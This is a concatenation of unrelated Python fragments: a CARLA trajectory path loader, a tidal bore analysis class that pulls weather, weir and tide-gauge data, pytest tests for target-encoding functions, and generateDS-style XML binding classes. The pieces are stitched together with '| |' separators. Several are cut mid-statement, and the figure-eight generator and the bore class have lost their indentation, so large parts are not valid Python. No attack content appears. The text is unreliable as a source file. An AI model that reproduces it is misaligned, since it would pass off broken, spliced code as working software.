    offline branch previously raised AttributeError; it now opens the file.
    """
    import json
    filename: str = 'town01/long_scenario_000.json'
    online: bool = True
    if online:
        import requests
        req = requests.get('https://github.nrel.gov/raw/HPC-CAVs/carla-collect/'
                           'master/docs/scenarios/' + filename)
        content = req.json()
    else:
        # json.load expects a file object; open the local scenario file.
        with open(filename) as f:
            content = json.load(f)
    path_list: List[Tuple[Vec2d, float]] = []
    seen_pairs = set()  # O(1) duplicate test (was an O(n) list lookup)
    target_speed: float = 30.
    for seg in content['segments']:
        segment_list = seg['segment']
        if len(segment_list) > 2:
            for elem in segment_list:
                pair = (elem[0], elem[1])
                if pair not in seen_pairs:
                    seen_pairs.add(pair)
                    path_list.append((Vec2d(float(elem[0]),
                                            float(elem[1])), target_speed))
    return path_list, False
def figure_eight_generator(process: 'TrajectoryTrackingProcess') -> Tuple[List[Tuple[Vec2d, float]], bool]:
# TODO: Two circles that touch at intersection
# find formula on curriculum_angled_path_generator
length: float = 3000.
target_speed: float = 15.0
A: float = 500.
B: float = 500.
wavelength: float = target_speed
segment_length = wavelength / 10.
num_segments = ceil(length / | |
(from)":"wind_deg"}, inplace=True)
df.rename(columns={"wind_speed (m/s)":"wind_speed"}, inplace=True)
df['time'] = pd.to_datetime(df['time'], format="%d/%m/%Y %H:%M")
#df['time'] = pd.to_datetime(df['time'], utc=True, format="%d/%m/%Y %H:%M")
#df.set_index(['time'], inplace=True)
for index, row in df.iterrows():
df.loc[index,'time'] = np.datetime64( df.at[index,'time'] ) # numpy.datetime64 in UTC
bore = xr.Dataset()
bore = df.to_xarray()
# Set the t_dim to be a dimension and 'time' to be a coordinate
bore = bore.rename_dims( {'index':'t_dim'} ).assign_coords( time=("t_dim", bore.time.data))
bore = bore.swap_dims( {'t_dim':'time'} )
self.bore = bore
logging.info('Bore data loaded')
def get_river_data(self, HLW_list=["LW"]):
"""
Get Chester weir data. Consolidate CTR data.
Data from the table takes precident. Gaps are filled by the API.
"""
if HLW_list != ["LW"]:
print('Not expecting that possibility here')
else:
# Obtain CTR data for LW for the observations times.
self.get_Glad_data(source='ctr',HLW_list=["LW"])
alph = self.bore['Chester Weir height: CHESTER WEIR 15 MIN SG'] *np.NaN
beta = self.bore['ctr_height_LW_ctr']
#print( self.bore['ctr_height_LW_ctr'][0:10] )
self.bore['ctr_height_LW'] = alph
self.bore['ctr_height_LW'].values = [alph[i].values if np.isfinite(alph[i].values) else beta[i].values for i in range(len(alph))]
# 2015-06-20T12:16:00 has a -ve value. Only keep +ve values
self.bore['ctr_height_LW'] = self.bore['ctr_height_LW'].where( self.bore['ctr_height_LW'].values>0)
#plt.plot( ctr_h_csv, 'b+' )
#plt.plot( self.bore['ctr_height_LW_ctr'], 'ro')
#plt.plot( self.bore['ctr_height_LW'], 'g.')
del self.bore['ctr_height_LW_ctr'], self.bore['ctr_time_LW_ctr']
def get_met_data(self): #, HLW:str="HW"):
"""
Get the met data time matching the observation.
Met data from OpenWeather history download.
This can then be exported into the obs table:
c.met.to_pandas().to_csv('met.csv')
"""
fn_openweather = "data/met/openweather_2005-01-01_2021-11-08.csv"
met = OpenWeather()
met.dataset = met.read_openweather_to_xarray(fn_openweather)
winsize = 6 #4h for HW, 6h for LW. +/- search distance for nearest extreme value
self.met = xr.Dataset()
for measure_var in ['wind_speed', 'wind_deg']:
met_var = []
met_time = []
for i in range(len(self.bore.time)):
try:
met_ds = None
obs_time = self.bore.time[i].values
# Find nearest met observation
dt = np.abs(met.dataset['time'] - obs_time)
index = np.argsort(dt).values
if winsize is not None: # if search window trucation exists
if np.timedelta64(dt[index[0]].values, "m").astype("int") <= 60 * winsize: # compare in minutes
#print(f"dt:{np.timedelta64(dt[index[0]].values, 'm').astype('int')}")
#print(f"winsize:{winsize}")
met_ds = met.dataset[measure_var][index[0]]
else:
# return a NaN in an xr.Dataset
# The rather odd trailing zero is to remove the array layer
# on both time and measurement, and to match the other
# alternative for a return
met_ds = xr.DataArray( [np.NaN], coords={'time': [obs_time]})
#met_ds = xr.Dataset({measure_var: ('time', [np.NaN])}, coords={'time': [obs_time]})
else: # give the closest without window search truncation
met_ds = met.dataset[measure_var][index[0]]
#print("time,HW:",obs_time, HW.values)
if type(met_ds) is xr.DataArray:
#print(f"met: {met_ds.values}")
met_var.append( float(met_ds.values) )
#print('len(met_var)', len(met_var))
met_time.append( met_ds.time.values )
#print('len(met_time)', len(met_time))
#self.bore['LT_h'][i] = HLW.dataset.sea_level[HLW.dataset['sea_level'].argmin()]
#self.bore['LT_t'][i] = HLW.dataset.time[HLW.dataset['sea_level'].argmin()]
#ind.append(i)
#print(f"i:{i}, {met_time[-1].astype('M8[ns]').astype('M8[ms]').item()}" )
#print(met_time[-1].astype('M8[ns]').astype('M8[ms]').item().strftime('%Y-%m-%d'))
## Make timeseries plot around the highwater maxima to check
# values are being extracted as expected.
if (i % 12) == 0:
fig = plt.figure()
if measure_var == "wind_speed":
ymax = 15
if measure_var == "wind_deg":
ymax = 360
plt.subplot(3,4,(i%12)+1)
plt.plot(met.dataset.time, met.dataset[measure_var])
plt.plot( met_time[-1], met_var[-1], 'r+' )
plt.plot( [self.bore.time[i].values,self.bore.time[i].values],[0,ymax],'k')
plt.xlim([met_time[-1] - np.timedelta64(5,'h'),
met_time[-1] + np.timedelta64(5,'h')])
#plt.ylim([0,11])
plt.text( met_time[-1]-np.timedelta64(5,'h'),ymax*0.9, self.bore.location[i].values)
plt.text( met_time[-1]-np.timedelta64(5,'h'),ymax*0.1, met_time[-1].astype('M8[ns]').astype('M8[ms]').item().strftime('%Y-%m-%d'))
# Turn off tick labels
plt.gca().axes.get_xaxis().set_visible(False)
#plt.xaxis_date()
#plt.autoscale_view()
if (i%12) == 12-1:
plt.savefig('figs/check_get_'+measure_var+'_times_'+str(i//12).zfill(2)+'.png')
plt.close('all')
else:
logging.info(f"Did not find a met time near this guess {obs_time}")
print(f"Did not find a met time near this guess {obs_time}")
except:
logging.warning('Issue with appending met data')
print('Issue with appending met data')
try: # Try and print the last observation timeseries
plt.savefig('figs/check_get_'+measure_var+'_times_'+str(i//12).zfill(2)+'.png')
plt.close('all')
except:
logging.info(f"Did not have any extra panels to plot")
print(f"Did not have any extra panels to plot")
# Save a xarray objects
coords = {'time': (('time'), self.bore.time.values)}
#print("number of obs:",len(self.bore.time))
#print("length of time", len(self.bore.time.values))
#print("length of data:", len(np.array(met_var)) )
self.met[measure_var] = xr.DataArray( np.array(met_var), coords=coords, dims=['time'])
def get_Glad_data(self, source:str='harmonic', HLW_list=["HW"]):
#def get_Glad_data(self, source:str='harmonic', HLW:str="HW"):
"""
Get Gladstone HLW data from external source
These data are reported in the bore.csv file but not consistently and it
is laborous to find old values.
It was considered a good idea to automate this step.
inputs:
source: 'harmonic' [default] - load HLW from harmonic prediction
'harmonic_rec' - reconstruct time series from harmonic constants
'bodc' - measured and processed data
'api' - load recent, un processed data from shoothill API
HLW_list: ["LW","HW","FW","EW"] - the data is either processed for High or Low water
events, or Flood or Ebb (inflection) events
"""
loc = "liv" # default location - Liverpool
logging.info("Get Gladstone HLW data")
if source == "harmonic": # Load tidetable data from files
filnam1 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2005_2014_HLW.txt'
filnam2 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2015_2020_HLW.txt'
filnam3 = '/Users/jeff/GitHub/DeeBore/data/Liverpool_2021_2022_HLW.txt'
tg = GAUGE()
tg1 = GAUGE()
tg2 = GAUGE()
tg3 = GAUGE()
tg1.dataset = tg1.read_hlw_to_xarray(filnam1)#, self.bore.time.min().values, self.bore.time.max().values)
tg2.dataset = tg2.read_hlw_to_xarray(filnam2)#, self.bore.time.min().values, self.bore.time.max().values)
tg3.dataset = tg3.read_hlw_to_xarray(filnam3)#, self.bore.time.min().values, self.bore.time.max().values)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset, tg3.dataset], dim='time')
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
elif source == "bodc": # load full 15min data from BODC files, extract HLW
dir = '/Users/jeff/GitHub/DeeBore/data/BODC_processed/'
filelist = ['2005LIV.txt',
'2006LIV.txt', '2007LIV.txt',
'2008LIV.txt', '2009LIV.txt',
'2010LIV.txt', '2011LIV.txt',
'2012LIV.txt', '2013LIV.txt',
'2014LIV.txt', '2015LIV.txt',
'2016LIV.txt', '2017LIV.txt',
'2018LIV.txt', '2019LIV.txt',
'2020LIV.txt',
'LIV2101.txt', 'LIV2102.txt',
'LIV2103.txt', 'LIV2104.txt',
'LIV2105.txt', 'LIV2106.txt',
'LIV2107.txt', 'LIV2108.txt',
'LIV2109.txt', 'LIV2110.txt']
tg = GAUGE()
for file in filelist:
tg0=GAUGE()
tg0.dataset = tg0.read_bodc_to_xarray(dir+file)
if tg.dataset is None:
tg.dataset = tg0.dataset
else:
tg.dataset = xr.concat([ tg.dataset, tg0.dataset], dim='time')
# Use QC to drop null values
#tg.dataset['sea_level'] = tg.dataset.sea_level.where( np.logical_or(tg.dataset.qc_flags=='', tg.dataset.qc_flags=='T'), drop=True)
tg.dataset['sea_level'] = tg.dataset.sea_level.where( tg.dataset.qc_flags!='N', drop=True)
# Fix some attributes (others might not be correct for all data)
tg.dataset['start_date'] = tg.dataset.time.min().values
tg.dataset['end_date'] = tg.dataset.time.max().values
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
#tg_HLW = tg.find_high_and_low_water(var_str='sea_level',method='cubic') #'cubic')
elif source == "api": # load full tidal signal from shoothill, extract HLW
date_start=np.datetime64('2005-04-01')
date_end=np.datetime64('now','D')
fn_archive = "liv" # File head for netcdf archive of api call
# Load timeseries from local file if it exists
try:
tg1 = GAUGE()
tg2 = GAUGE()
tg = GAUGE()
# Load local file. Created with archive_shoothill.py
dir = "archive_shoothill/"
tg1.dataset = xr.open_mfdataset(dir + fn_archive + "_????.nc") # Tidal port Gladstone Dock, Liverpool
tg1.dataset = tg1.dataset.sel(time=slice(date_start, date_end))
print(f"{len(tg1.dataset.time)} pts loaded from netcdf")
if (tg1.dataset.time[-1].values < date_end):
tg2 = GAUGE()
tg2.dataset = tg2.read_shoothill_to_xarray(date_start=tg1.dataset.time[-1].values, date_end=date_end)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset], dim='time')
print(f"{len(tg2.dataset.time)} pts loaded from API")
else:
tg = tg1
except:
tg.dataset = tg.read_shoothill_to_xarray(date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
#tg_HLW = tg.find_high_and_low_water(var_str='sea_level',method='cubic') #'cubic')
elif source == "ctr": # use api to load chester weir. Reset loc variable
loc = "ctr"
tg = GAUGE()
date_start=np.datetime64('2014-01-01')
date_end=np.datetime64('now','D')
#station_id = 7900 # below weir
station_id = 7899 # above weir
fn_archive = "ctr" # File head for netcdf archive of api call
station_id = 968
fn_archive = "iron"
# Load timeseries from local file if it exists
try:
tg1 = GAUGE()
tg2 = GAUGE()
tg = GAUGE()
# Load local file. Created with archive_shoothill.py
dir = "archive_shoothill/"
tg1.dataset = xr.open_mfdataset(dir + fn_archive + "_????.nc") # Tidal port Gladstone Dock, Liverpool
tg1.dataset = tg1.dataset.sel(time=slice(date_start, date_end))
print(f"{len(tg1.dataset.time)} pts loaded from netcdf")
if (tg1.dataset.time[-1].values < date_end):
tg2 = GAUGE()
tg2.dataset = tg2.read_shoothill_to_xarray(station_id=station_id, date_start=tg1.dataset.time[-1].values, date_end=date_end)
tg.dataset = xr.concat([ tg1.dataset, tg2.dataset], dim='time')
print(f"{len(tg2.dataset.time)} pts loaded from API")
else:
tg = tg1
except:
tg.dataset = tg.read_shoothill_to_xarray(station_id=station_id ,date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
elif source == 'harmonic_rec': # load full tidal signal using anyTide code, extract HLW
tg = GAUGE()
#date_start=np.datetime64('now')
#ndays = 5
#tg.dataset = tg.anyTide_to_xarray(date_start=date_start, ndays=5)
date_start=np.datetime64('2005-04-01')
date_end=np.datetime64('now','D')
tg.dataset = tg.anyTide_to_xarray(date_start=date_start, date_end=date_end)
# This produces an xr.dataset with sea_level_highs and sea_level_lows
# with time variables time_highs and time_lows.
tg_HLW = tg.find_high_and_low_water(var_str='sea_level')
else:
logging.debug(f"Did not expect this eventuality...")
self.tg = tg
## Process the *_highs or *_lows
for HLW in HLW_list:
print(f"HLW: {HLW}")
#time_var = 'time_highs'
#measure_var = 'sea_level_highs'
#ind = [] # list of indices in the obs bore data where gladstone data is found
if HLW == 'HW':
time_var = 'time_highs'
measure_var = 'sea_level_highs'
elif HLW == 'LW':
time_var = 'time_lows'
measure_var = 'sea_level_lows'
elif HLW == 'FW':
time_var = 'time_flood'
measure_var = 'sea_level_flood'
elif HLW == 'EW':
time_var = 'time_ebb'
measure_var = 'sea_level_ebb'
else:
print('This should | |
= te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 3
assert dfo.loc[0, 'b'] == 1
assert dfo.loc[1, 'b'] == 1
assert dfo.loc[2, 'b'] == 5
assert dfo.loc[3, 'b'] == 5
assert dfo.loc[4, 'b'] == 9
assert dfo.loc[5, 'b'] == 9
assert dfo.loc[6, 'b'] == 20
assert dfo.loc[7, 'b'] == 20
assert dfo.loc[8, 'b'] == 20
assert np.isnan(dfo.loc[9, 'b'])
assert dfo.loc[0, 'c'] == 2
assert dfo.loc[1, 'c'] == 2
assert dfo.loc[2, 'c'] == 2
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 8
assert dfo.loc[5, 'c'] == 8
assert np.isnan(dfo.loc[6, 'c'])
assert np.isnan(dfo.loc[7, 'c'])
assert np.isnan(dfo.loc[8, 'c'])
assert dfo.loc[9, 'c'] == 1000
# Should auto-detect categorical columns if cols is not specified
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['c'] = ['a', 'a', 'a', 'b', 'b', 'b', np.nan, np.nan, np.nan, 'c']
te = TargetEncoder()
dfo = te.fit_transform(df[['a', 'b', 'c']], df['y'])
assert 'a' in dfo
assert 'b' in dfo
assert 'c' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 3
assert dfo.loc[0, 'b'] == 1
assert dfo.loc[1, 'b'] == 1
assert dfo.loc[2, 'b'] == 5
assert dfo.loc[3, 'b'] == 5
assert dfo.loc[4, 'b'] == 9
assert dfo.loc[5, 'b'] == 9
assert dfo.loc[6, 'b'] == 20
assert dfo.loc[7, 'b'] == 20
assert dfo.loc[8, 'b'] == 20
assert np.isnan(dfo.loc[9, 'b'])
assert dfo.loc[0, 'c'] == 2
assert dfo.loc[1, 'c'] == 2
assert dfo.loc[2, 'c'] == 2
assert dfo.loc[3, 'c'] == 8
assert dfo.loc[4, 'c'] == 8
assert dfo.loc[5, 'c'] == 8
assert np.isnan(dfo.loc[6, 'c'])
assert np.isnan(dfo.loc[7, 'c'])
assert np.isnan(dfo.loc[8, 'c'])
assert dfo.loc[9, 'c'] == 1000
def test_TargetEncoderCV():
    """Tests encoding.TargetEncoderCV"""

    def check_columns(frame, cols):
        # Encoded frame keeps the feature columns and never the target.
        for col in cols:
            assert col in frame
        assert 'y' not in frame

    def check_values(frame, col, expected):
        # None marks entries that must be NaN (NaN input, or a category
        # seen only in the test fold).
        for row, want in enumerate(expected):
            if want is None:
                assert np.isnan(frame.loc[row, col])
            else:
                assert frame.loc[row, col] == want

    # Basic two-fold, unshuffled encoding: each half is encoded with the
    # other half's per-category target means.
    df = pd.DataFrame()
    df['a'] = np.random.randn(10)
    df['b'] = ['a', 'a', 'b', 'b', np.nan, 'a', 'a', 'b', 'b', 'c']
    df['y'] = [0, 2, 8, 10, -1000, 4, 6, 12, 14, 1000]
    out = TargetEncoderCV(cols='b', n_splits=2, shuffle=False).fit_transform(
        df[['a', 'b']], df['y'])
    check_columns(out, ['a', 'b'])
    assert out.shape == (10, 2)
    check_values(out, 'b', [5, 5, 13, 13, None, 1, 1, 9, 9, None])

    # Setting n_splits should change the fold layout.
    df = pd.DataFrame()
    df['a'] = np.random.randn(9)
    df['b'] = ['a', 'a', 'b', 'b', 'b', 'a', 'a', 'a', 'b']
    df['y'] = [0, 1, 11, 12, 13, 2, 3, 4, 14]
    out = TargetEncoderCV(cols='b', n_splits=3, shuffle=False).fit_transform(
        df[['a', 'b']], df['y'])
    check_columns(out, ['a', 'b'])
    assert out.shape == (9, 2)
    check_values(out, 'b', [3, 3, 13, 12.5, 12.5, 2, 1, 1, 12])

    # Shuffling: three folds give three distinct encodings per category,
    # each close to that category's target centre but not equal to the
    # overall mean.
    df = pd.DataFrame()
    df['a'] = np.random.randn(100)
    df['b'] = 50 * ['aa', 'bb']
    df['y'] = np.zeros(100)
    df.loc[df['b'] == 'aa', 'y'] = np.random.randn(50)
    df.loc[df['b'] == 'bb', 'y'] = 1000 + np.random.randn(50)
    out = TargetEncoderCV(cols='b', n_splits=3, shuffle=True).fit_transform(
        df[['a', 'b']], df['y'])
    assert out['b'].nunique() == 6
    for category, center in [('aa', 0.0), ('bb', 1000.0)]:
        vals = out.loc[df['b'] == category, 'b']
        assert vals.nunique() == 3
        assert not (vals.unique() == vals.mean()).any()
        assert (abs(vals.unique() - center) < 1.0).all()

    # Multiple columns at once.
    df = pd.DataFrame()
    df['a'] = np.random.randn(8)
    df['b'] = ['a', 'a', 'b', 'b', 'a', 'a', 'b', 'b']
    df['c'] = ['a', 'b', 'a', 'b', 'a', 'b', 'a', 'b']
    df['y'] = [0, 1, 10, 11, 2, 3, 12, 13]
    out = TargetEncoderCV(cols=['b', 'c'], n_splits=2, shuffle=False).fit_transform(
        df[['a', 'b', 'c']], df['y'])
    check_columns(out, ['a', 'b', 'c'])
    assert out.shape == (8, 3)
    check_values(out, 'b', [2.5, 2.5, 12.5, 12.5, 0.5, 0.5, 10.5, 10.5])
    check_values(out, 'c', [7, 8, 7, 8, 5, 6, 5, 6])

    # Categorical columns are auto-detected when cols is not specified.
    df = pd.DataFrame()
    df['a'] = np.random.randn(8)
    df['b'] = ['a', 'a', 'b', 'b', 'a', 'a', 'b', 'b']
    df['c'] = ['a', 'b', 'a', 'b', 'a', 'b', 'a', 'b']
    df['y'] = [0, 1, 10, 11, 2, 3, 12, 13]
    out = TargetEncoderCV(n_splits=2, shuffle=False).fit_transform(
        df[['a', 'b', 'c']], df['y'])
    check_columns(out, ['a', 'b', 'c'])
    assert out.shape == (8, 3)
    check_values(out, 'b', [2.5, 2.5, 12.5, 12.5, 0.5, 0.5, 10.5, 10.5])
    check_values(out, 'c', [7, 8, 7, 8, 5, 6, 5, 6])
def test_target_encode():
    """Tests encoding.target_encode"""
    # Per-category target means: a->1, b->5, c->9, d->20; NaN propagates.
    frame = pd.DataFrame()
    frame['a'] = np.random.randn(10)
    frame['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
    frame['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 1000]
    out = target_encode(frame[['a', 'b']], frame['y'], cols='b')
    for col in ('a', 'b'):
        assert col in out
    assert 'y' not in out
    assert out.shape == (10, 2)
    expected = [1, 1, 5, 5, 9, 9, 20, 20, 20, None]
    for row, want in enumerate(expected):
        if want is None:
            assert np.isnan(out.loc[row, 'b'])
        else:
            assert out.loc[row, 'b'] == want
def test_target_encode_cv():
    """Tests encoding.target_encode_cv"""
    frame = pd.DataFrame()
    frame['a'] = np.random.randn(10)
    frame['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
    frame['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 1000]
    out = target_encode_cv(frame[['a', 'b']], frame['y'], cols='b')
    # Only columns and shape are pinned here: the CV fold assignment
    # determines the exact encoded values.
    for col in ('a', 'b'):
        assert col in out
    assert 'y' not in out
    assert out.shape == (10, 2)
def test_target_encode_loo():
"""Tests encoding.target_encode_loo"""
# Data
df = pd.DataFrame()
df['a'] = np.random.randn(10)
df['b'] = ['a', 'a', 'b', 'b', 'c', 'c', 'd', 'd', 'd', np.nan]
df['y'] = [0, 2, 4, 6, 8, 10, 19, 20, 21, 15]
# Encode
dfo = target_encode_loo(df[['a', 'b']], df['y'], cols='b')
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
assert dfo.loc[0, 'b'] == 2
assert dfo.loc[1, 'b'] == 0
assert dfo.loc[2, 'b'] == 6
assert dfo.loc[3, 'b'] == 4
assert dfo.loc[4, 'b'] == 10
assert dfo.loc[5, 'b'] == 8
assert dfo.loc[6, 'b'] == 20.5
assert dfo.loc[7, 'b'] == 20.0
assert dfo.loc[8, 'b'] == 19.5
assert np.isnan(dfo.loc[9, 'b'])
# Encode w/ bayesian_c
dfo = target_encode_loo(df[['a', 'b']], df['y'], cols='b', bayesian_c=10)
# Check outputs
assert 'a' in dfo
assert 'b' in dfo
assert 'y' not in dfo
assert dfo.shape[0] == 10
assert dfo.shape[1] == 2
# The mean (10.5) should bring a, b, c up, but d down
assert dfo.loc[0, 'b'] > 2
assert dfo.loc[1, 'b'] > | |
MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name,
base64.b64encode(self.value),
self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(
element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type,
self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
    """Metadata record for one member of a generated binding class.

    Holds the member's name, its XML data type (a plain string or a chain
    of strings), a container flag, an optional flag, child attributes and
    choice-group information.  Accessors mirror the attributes;
    get_data_type() resolves a type chain to its effective (last) entry.
    """

    def __init__(self, name='', data_type='', container=0,
                 optional=0, child_attrs=None, choice=None):
        self.name = name
        self.data_type = data_type
        self.container = container
        self.child_attrs = child_attrs
        self.choice = choice
        self.optional = optional

    def set_name(self, name):
        self.name = name

    def get_name(self):
        return self.name

    def set_data_type(self, data_type):
        self.data_type = data_type

    def get_data_type_chain(self):
        return self.data_type

    def get_data_type(self):
        # A list is a chain of types; the effective one is the last entry,
        # falling back to 'xs:string' for an empty chain.
        if not isinstance(self.data_type, list):
            return self.data_type
        return self.data_type[-1] if self.data_type else 'xs:string'

    def set_container(self, container):
        self.container = container

    def get_container(self):
        return self.container

    def set_child_attrs(self, child_attrs):
        self.child_attrs = child_attrs

    def get_child_attrs(self):
        return self.child_attrs

    def set_choice(self, choice):
        self.choice = choice

    def get_choice(self):
        return self.choice

    def set_optional(self, optional):
        self.optional = optional

    def get_optional(self):
        return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class DocumentStatus(Enum):
    """DocumentStatus - enum

    Status values a document can carry; serialized as the string values
    below.
    """
    PENDING='Pending' # Pending
    QUEUED='Queued' # Queued
    PROCESSING='Processing' # Processing
    COMPLETED='Completed' # Completed
    ERROR='Error' # Error
class Language(Enum):
    """Language - enum

    Supported language codes: 'en' and 'fr'.
    """
    EN='en' # en
    FR='fr' # fr
class Request(GeneratedsSuper):
    """Generated binding for the ``Request`` XML complex type.

    The schema declares no attributes or child elements for this type,
    so instances carry only generateDS bookkeeping state.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Hooks allowing callers to substitute a subclass via factory().
    subclass = None
    superclass = None
    def __init__(self, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, before instantiating Request directly.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, Request)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if Request.subclass:
            return Request.subclass(*args_, **kwargs_)
        else:
            return Request(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def hasContent_(self):
        # Generated membership test: the condition is an empty tuple and is
        # therefore always falsy -- Request declares no members, so it never
        # has content and always exports as a self-closing tag.
        if (
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Request', pretty_print=True):
        """Serialize this element to *outfile* as XML."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('Request')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Re-use the tag name this object was originally parsed from
        if self.original_tagname_ is not None and name_ == 'Request':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='Request')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='Request', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # hasContent_() is always False here, so a self-closing tag is
            # the branch actually taken.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='Request'):
        # No attributes are declared for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='', name_='Request', fromsubclass_=False, pretty_print=True):
        # No child elements are declared for this type.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from an ElementTree *node*; returns self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to parse for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No child elements to parse for this type.
        pass
# end class Request
class ArrayOfDocumentCriteria(GeneratedsSuper):
    """Generated binding for the ``ArrayOfDocumentCriteria`` XML complex type.

    Wraps a repeatable sequence of ``DocumentCriteria`` child elements.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Hooks allowing callers to substitute a subclass via factory().
    subclass = None
    superclass = None
    def __init__(self, DocumentCriteria=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = None
        # Default to a fresh list per instance (avoids shared mutable state)
        if DocumentCriteria is None:
            self.DocumentCriteria = []
        else:
            self.DocumentCriteria = DocumentCriteria
        self.DocumentCriteria_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, before instantiating this class directly.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, ArrayOfDocumentCriteria)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
